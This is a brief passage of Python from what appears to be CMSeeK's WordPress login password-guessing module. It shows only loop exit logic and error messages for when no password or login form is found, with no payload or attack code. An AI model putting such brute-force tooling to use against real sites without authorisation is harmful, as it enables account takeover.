                        # iteration (break / continue).
                        break
                if passfound == '0':
                    cmseek.error('\n\nCould Not find Password!')
                print('\n\n')

        else:
            cmseek.error("Couldn't find login form... CMSeeK is quitting")
            # print(wploginsrc[1])
            cmseek.handle_quit()